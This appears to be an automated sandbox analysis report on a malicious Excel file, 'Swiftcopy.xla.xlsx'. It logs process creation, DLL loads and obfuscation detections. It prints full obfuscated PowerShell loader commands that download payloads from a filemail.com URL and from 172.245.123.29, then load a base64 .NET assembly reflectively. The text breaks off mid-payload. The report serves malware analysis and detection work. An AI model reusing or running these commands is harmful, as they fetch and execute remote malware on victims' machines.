      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: Swiftcopy.xla.xlsxStatic file information: File size 1158144 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C282000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Hp6pdblib.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb1 source: powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdbhP source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdb source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp
      Source: 73B30000.0.drInitial sample: OLE indicators vbamacros = False
      Source: Swiftcopy.xla.xlsxInitial sample: OLE indicators encrypted = True

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
      PowerShell case anomaly found
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR